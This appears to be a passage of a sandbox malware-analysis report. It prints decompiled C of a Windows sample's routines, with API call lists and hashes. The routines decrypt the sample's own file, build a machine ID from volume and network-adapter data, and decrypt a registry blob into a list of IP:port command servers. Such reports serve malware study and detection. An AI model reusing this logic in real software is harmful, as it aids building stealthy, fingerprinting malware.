                                                                                                                                                                                                                                                                          					_t90 = CreateFileA( &_v1308, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                          					_v784 = _t90;
                                                                                                                                                                                                                                                                          					if(_v784 == 0xffffffff) {
                                                                                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v1312 = GetFileSize(_v784, 0);
                                                                                                                                                                                                                                                                          					if(_v1312 == 0) {
                                                                                                                                                                                                                                                                          						L22:
                                                                                                                                                                                                                                                                          						if(_v784 != 0) {
                                                                                                                                                                                                                                                                          							CloseHandle(_v784);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t94 = VirtualAlloc(0, _v1312, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v1316 = _t94;
                                                                                                                                                                                                                                                                          					if(_v1316 == 0) {
                                                                                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v1320 = 0;
                                                                                                                                                                                                                                                                          					_t97 = ReadFile(_v784, _v1316, _v1312,  &_v1320, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t97 == 0 || _v1320 != _v1312) {
                                                                                                                                                                                                                                                                          						L20:
                                                                                                                                                                                                                                                                          						if(_v1316 != 0) {
                                                                                                                                                                                                                                                                          							VirtualFree(_v1316, 0, 0x8000);
                                                                                                                                                                                                                                                                          							_v1316 = 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						FindCloseChangeNotification(_v784); // executed
                                                                                                                                                                                                                                                                          						_v784 = 0;
                                                                                                                                                                                                                                                                          						_t101 = E040047F0(_v1316, _v1312, _a8); // executed
                                                                                                                                                                                                                                                                          						_t156 = _t155 + 0xc;
                                                                                                                                                                                                                                                                          						if((_t101 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          							if(_v1316 != 0) {
                                                                                                                                                                                                                                                                          								VirtualFree(_v1316, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								_v1316 = 0;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v1328 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                          							_v1324 = _v1328 + ( *(_v1328 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                          							_v1332 = 0;
                                                                                                                                                                                                                                                                          							while(_v1332 < ( *(_v1328 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                          								_v1336 =  *((intOrPtr*)(_v1324 + 0xc + _v1332 * 0x28)) + _a4;
                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28)) <=  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28))) {
                                                                                                                                                                                                                                                                          									_v1344 =  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v1344 =  *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v1340 = _v1344;
                                                                                                                                                                                                                                                                          								_t114 = E040047F0(_v1336, _v1340, _a8); // executed
                                                                                                                                                                                                                                                                          								_t156 = _t156 + 0xc;
                                                                                                                                                                                                                                                                          								if((_t114 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          									_v1332 = _v1332 + 1;
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v5 = 1;
                                                                                                                                                                                                                                                                          									goto L20;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v5 = 1;
                                                                                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                          0x0400451a
                                                                                                                                                                                                                                                                          0x04004522
                                                                                                                                                                                                                                                                          0x040047e6
                                                                                                                                                                                                                                                                          0x040047ed
                                                                                                                                                                                                                                                                          0x04004532
                                                                                                                                                                                                                                                                          0x04004556
                                                                                                                                                                                                                                                                          0x0400455b
                                                                                                                                                                                                                                                                          0x0400456c
                                                                                                                                                                                                                                                                          0x0400458b
                                                                                                                                                                                                                                                                          0x04004591
                                                                                                                                                                                                                                                                          0x0400459e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040045b3
                                                                                                                                                                                                                                                                          0x040045c0
                                                                                                                                                                                                                                                                          0x040047d0
                                                                                                                                                                                                                                                                          0x040047d7
                                                                                                                                                                                                                                                                          0x040047e0
                                                                                                                                                                                                                                                                          0x040047e0
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040047d7
                                                                                                                                                                                                                                                                          0x040045d6
                                                                                                                                                                                                                                                                          0x040045dc
                                                                                                                                                                                                                                                                          0x040045e9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040045ef
                                                                                                                                                                                                                                                                          0x04004617
                                                                                                                                                                                                                                                                          0x0400461f
                                                                                                                                                                                                                                                                          0x040047a9
                                                                                                                                                                                                                                                                          0x040047b0
                                                                                                                                                                                                                                                                          0x040047c0
                                                                                                                                                                                                                                                                          0x040047c6
                                                                                                                                                                                                                                                                          0x040047c6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004637
                                                                                                                                                                                                                                                                          0x0400463e
                                                                                                                                                                                                                                                                          0x04004644
                                                                                                                                                                                                                                                                          0x04004660
                                                                                                                                                                                                                                                                          0x04004665
                                                                                                                                                                                                                                                                          0x0400466d
                                                                                                                                                                                                                                                                          0x0400467f
                                                                                                                                                                                                                                                                          0x0400468f
                                                                                                                                                                                                                                                                          0x04004695
                                                                                                                                                                                                                                                                          0x04004695
                                                                                                                                                                                                                                                                          0x040046a8
                                                                                                                                                                                                                                                                          0x040046c2
                                                                                                                                                                                                                                                                          0x040046c8
                                                                                                                                                                                                                                                                          0x040046e3
                                                                                                                                                                                                                                                                          0x0400470f
                                                                                                                                                                                                                                                                          0x0400473b
                                                                                                                                                                                                                                                                          0x0400476b
                                                                                                                                                                                                                                                                          0x0400473d
                                                                                                                                                                                                                                                                          0x04004750
                                                                                                                                                                                                                                                                          0x04004750
                                                                                                                                                                                                                                                                          0x04004777
                                                                                                                                                                                                                                                                          0x0400478f
                                                                                                                                                                                                                                                                          0x04004794
                                                                                                                                                                                                                                                                          0x0400479c
                                                                                                                                                                                                                                                                          0x040046dd
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                          0x0400479c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040046e3
                                                                                                                                                                                                                                                                          0x0400466f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400466f
                                                                                                                                                                                                                                                                          0x0400461f

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: GetLastError.KERNEL32 ref: 04004834
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400468F
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 040047E0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2585753175-0
                                                                                                                                                                                                                                                                          • Opcode ID: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
                                                                                                                                                                                                                                                                          • Instruction ID: c94ea80790bf0b6d8dbf2583483555f7aa9864fa89971da120b97b62dce4532c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92815D74A056189BEB64CF14DC94BAAB7B4AF49306F0091D9E608BB2C1D774ABC1CF54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                          			E04009D20(intOrPtr _a4, CHAR* _a8, int _a12) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				char _v292;
                                                                                                                                                                                                                                                                          				intOrPtr _v296;
                                                                                                                                                                                                                                                                          				char _v404;
                                                                                                                                                                                                                                                                          				long _v408;
                                                                                                                                                                                                                                                                          				char _v673;
                                                                                                                                                                                                                                                                          				char _v676;
                                                                                                                                                                                                                                                                          				intOrPtr _v680;
                                                                                                                                                                                                                                                                          				long _v684;
                                                                                                                                                                                                                                                                          				signed int _v688;
                                                                                                                                                                                                                                                                          				short* _v692;
                                                                                                                                                                                                                                                                          				signed int _v696;
                                                                                                                                                                                                                                                                          				unsigned int _v700;
                                                                                                                                                                                                                                                                          				intOrPtr _v704;
                                                                                                                                                                                                                                                                          				char _v900;
                                                                                                                                                                                                                                                                          				signed int _v904;
                                                                                                                                                                                                                                                                          				signed int _v908;
                                                                                                                                                                                                                                                                          				int _v912;
                                                                                                                                                                                                                                                                          				int _t71;
                                                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                                                          				short** _t76;
                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0x20;
                                                                                                                                                                                                                                                                          					_v24 = 6;
                                                                                                                                                                                                                                                                          					_v684 = 0;
                                                                                                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                                                                                                          					_v408 = 0;
                                                                                                                                                                                                                                                                          					_v16 = 0x19660d;
                                                                                                                                                                                                                                                                          					_v296 = 0x3c6ef35f;
                                                                                                                                                                                                                                                                          					_v680 = _a4;
                                                                                                                                                                                                                                                                          					if(GetSystemDirectoryA( &_v676, 0x103) != 0) {
                                                                                                                                                                                                                                                                          						_v673 = 0;
                                                                                                                                                                                                                                                                          						_t71 = GetVolumeInformationA( &_v676,  &_v292, 0x103,  &_v684,  &_v20,  &_v408,  &_v404, 0x63); // executed
                                                                                                                                                                                                                                                                          						if(_t71 != 0) {
                                                                                                                                                                                                                                                                          							_v688 = 0xffffffff;
                                                                                                                                                                                                                                                                          							E04007D20(_t71,  &_v900, 0, 0xc0);
                                                                                                                                                                                                                                                                          							_v700 = 0;
                                                                                                                                                                                                                                                                          							_t74 = E04009F70( &_v900, 0xc0,  &_v700); // executed
                                                                                                                                                                                                                                                                          							if(_t74 != 0) {
                                                                                                                                                                                                                                                                          								_v904 = 0;
                                                                                                                                                                                                                                                                          								while(_v904 < _v700 >> 2) {
                                                                                                                                                                                                                                                                          									_v688 = _v688 ^  *(_t114 + _v904 * 4 - 0x380);
                                                                                                                                                                                                                                                                          									_v904 = _v904 + 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v696 = _v684;
                                                                                                                                                                                                                                                                          							_v908 = 0;
                                                                                                                                                                                                                                                                          							while(_v908 < 4) {
                                                                                                                                                                                                                                                                          								 *(_v680 + _v908 * 4) = 0x3c6ef35f + _v696 * 0x0019660d ^ _v688;
                                                                                                                                                                                                                                                                          								_v696 = 0x3c6ef35f + _v696 * 0x19660d;
                                                                                                                                                                                                                                                                          								_v908 = _v908 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t76 =  &_v692;
                                                                                                                                                                                                                                                                          							__imp__StringFromCLSID(_a4, _t76); // executed
                                                                                                                                                                                                                                                                          							_v704 = _t76;
                                                                                                                                                                                                                                                                          							if(_v704 >= 0) {
                                                                                                                                                                                                                                                                          								_v912 = WideCharToMultiByte(0, 0, _v692, 0xffffffff, _a8, _a12, 0, 0);
                                                                                                                                                                                                                                                                          								lstrcpynA(_a8,  &(_a8[1]), _v912 - 2);
                                                                                                                                                                                                                                                                          								_v5 = 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__imp__CoTaskMemFree(_v692);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}





























                                                                                                                                                                                                                                                                          0x04009d29
                                                                                                                                                                                                                                                                          0x04009d31
                                                                                                                                                                                                                                                                          0x04009d4b
                                                                                                                                                                                                                                                                          0x04009d52
                                                                                                                                                                                                                                                                          0x04009d59
                                                                                                                                                                                                                                                                          0x04009d63
                                                                                                                                                                                                                                                                          0x04009d6a
                                                                                                                                                                                                                                                                          0x04009d74
                                                                                                                                                                                                                                                                          0x04009d7b
                                                                                                                                                                                                                                                                          0x04009d88
                                                                                                                                                                                                                                                                          0x04009da2
                                                                                                                                                                                                                                                                          0x04009da8
                                                                                                                                                                                                                                                                          0x04009ddd
                                                                                                                                                                                                                                                                          0x04009de5
                                                                                                                                                                                                                                                                          0x04009deb
                                                                                                                                                                                                                                                                          0x04009e03
                                                                                                                                                                                                                                                                          0x04009e0b
                                                                                                                                                                                                                                                                          0x04009e28
                                                                                                                                                                                                                                                                          0x04009e32
                                                                                                                                                                                                                                                                          0x04009e34
                                                                                                                                                                                                                                                                          0x04009e4f
                                                                                                                                                                                                                                                                          0x04009e73
                                                                                                                                                                                                                                                                          0x04009e49
                                                                                                                                                                                                                                                                          0x04009e49
                                                                                                                                                                                                                                                                          0x04009e4f
                                                                                                                                                                                                                                                                          0x04009e81
                                                                                                                                                                                                                                                                          0x04009e87
                                                                                                                                                                                                                                                                          0x04009ea2
                                                                                                                                                                                                                                                                          0x04009ecf
                                                                                                                                                                                                                                                                          0x04009ee4
                                                                                                                                                                                                                                                                          0x04009e9c
                                                                                                                                                                                                                                                                          0x04009e9c
                                                                                                                                                                                                                                                                          0x04009eec
                                                                                                                                                                                                                                                                          0x04009ef7
                                                                                                                                                                                                                                                                          0x04009efd
                                                                                                                                                                                                                                                                          0x04009f0a
                                                                                                                                                                                                                                                                          0x04009f2b
                                                                                                                                                                                                                                                                          0x04009f46
                                                                                                                                                                                                                                                                          0x04009f4c
                                                                                                                                                                                                                                                                          0x04009f4c
                                                                                                                                                                                                                                                                          0x04009f57
                                                                                                                                                                                                                                                                          0x04009f57
                                                                                                                                                                                                                                                                          0x04009de5
                                                                                                                                                                                                                                                                          0x04009da2
                                                                                                                                                                                                                                                                          0x04009f63

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 04009D9A
                                                                                                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
                                                                                                                                                                                                                                                                            • Part of subcall function 04009F70: GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB
                                                                                                                                                                                                                                                                          • StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 04009F25
                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 04009F46
                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 04009F57
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2697952880-3916222277
                                                                                                                                                                                                                                                                          • Opcode ID: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
                                                                                                                                                                                                                                                                          • Instruction ID: 5e89223982a4db5088977870fe710af53f8bde251be69ccbe6f0708d183867dd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 695139B0A043189FEB25CF50CC88BEAB7B9BB44304F14C2D9E5096A281DB74AB84CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                          			E04007970(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                          				void* _v40;
                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                                                                                          				intOrPtr _t83;
                                                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					_v16 = 0x8c;
                                                                                                                                                                                                                                                                          					_v20 = 0x75bc;
                                                                                                                                                                                                                                                                          					_t50 = VirtualAlloc(0, 0x75bc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t50;
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_t72 =  *0x400e28c; // 0x4013f88
                                                                                                                                                                                                                                                                          						_t83 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          						_t52 = E0400A400(_t83, _t72, _v12, 0x75bc); // executed
                                                                                                                                                                                                                                                                          						_t97 = _t96 + 0x10;
                                                                                                                                                                                                                                                                          						_v24 = _t52;
                                                                                                                                                                                                                                                                          						if(_v24 >= 0x92) {
                                                                                                                                                                                                                                                                          							_v28 = _v24 - 0x8c;
                                                                                                                                                                                                                                                                          							_t58 = E04008A70(_v12 + 0x8c,  &_v28, _v12, 0x8c, 0x40130e8, 0x254);
                                                                                                                                                                                                                                                                          							_t98 = _t97 + 0x18;
                                                                                                                                                                                                                                                                          							if(_t58 != 0) {
                                                                                                                                                                                                                                                                          								_v32 = _v12 + 0x8c;
                                                                                                                                                                                                                                                                          								_v36 = _v28 / 6;
                                                                                                                                                                                                                                                                          								_v40 = VirtualAlloc(0, _v36 * 0x28, 0x3000, 4);
                                                                                                                                                                                                                                                                          								if(_v40 != 0) {
                                                                                                                                                                                                                                                                          									_v48 = 0;
                                                                                                                                                                                                                                                                          									while(_v48 < _v36) {
                                                                                                                                                                                                                                                                          										_t64 = E04007B70( &_v44, _v48 * 6 + _v32, 4);
                                                                                                                                                                                                                                                                          										_push(_v44);
                                                                                                                                                                                                                                                                          										L0400B1EC();
                                                                                                                                                                                                                                                                          										_v52 = _t64;
                                                                                                                                                                                                                                                                          										wnsprintfA(_v48 * 0x28 + _v40, 0x28, "%s:%u", _v52,  *(_v32 + 4 + _v48 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                          										_t98 = _t98 + 0x20;
                                                                                                                                                                                                                                                                          										_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          										_v48 = _v48 + 1;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									 *_a4 = _v40;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                          0x04007976
                                                                                                                                                                                                                                                                          0x04007981
                                                                                                                                                                                                                                                                          0x04007987
                                                                                                                                                                                                                                                                          0x0400798e
                                                                                                                                                                                                                                                                          0x040079a3
                                                                                                                                                                                                                                                                          0x040079a9
                                                                                                                                                                                                                                                                          0x040079b0
                                                                                                                                                                                                                                                                          0x040079bf
                                                                                                                                                                                                                                                                          0x040079c6
                                                                                                                                                                                                                                                                          0x040079cd
                                                                                                                                                                                                                                                                          0x040079d2
                                                                                                                                                                                                                                                                          0x040079d5
                                                                                                                                                                                                                                                                          0x040079df
                                                                                                                                                                                                                                                                          0x040079ed
                                                                                                                                                                                                                                                                          0x04007a10
                                                                                                                                                                                                                                                                          0x04007a15
                                                                                                                                                                                                                                                                          0x04007a1a
                                                                                                                                                                                                                                                                          0x04007a29
                                                                                                                                                                                                                                                                          0x04007a38
                                                                                                                                                                                                                                                                          0x04007a51
                                                                                                                                                                                                                                                                          0x04007a58
                                                                                                                                                                                                                                                                          0x04007a5a
                                                                                                                                                                                                                                                                          0x04007a6c
                                                                                                                                                                                                                                                                          0x04007a84
                                                                                                                                                                                                                                                                          0x04007a8f
                                                                                                                                                                                                                                                                          0x04007a90
                                                                                                                                                                                                                                                                          0x04007a95
                                                                                                                                                                                                                                                                          0x04007abc
                                                                                                                                                                                                                                                                          0x04007ac2
                                                                                                                                                                                                                                                                          0x04007acb
                                                                                                                                                                                                                                                                          0x04007a69
                                                                                                                                                                                                                                                                          0x04007a69
                                                                                                                                                                                                                                                                          0x04007ad6
                                                                                                                                                                                                                                                                          0x04007ad6
                                                                                                                                                                                                                                                                          0x04007a58
                                                                                                                                                                                                                                                                          0x04007a1a
                                                                                                                                                                                                                                                                          0x04007ae3
                                                                                                                                                                                                                                                                          0x04007ae3
                                                                                                                                                                                                                                                                          0x040079b0
                                                                                                                                                                                                                                                                          0x04007aef

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 040079A3
                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegCloseKey.KERNEL32(00000000), ref: 0400A494
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04007AE3
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007A4B
                                                                                                                                                                                                                                                                          • inet_ntoa.WS2_32(?), ref: 04007A90
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 04007ABC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
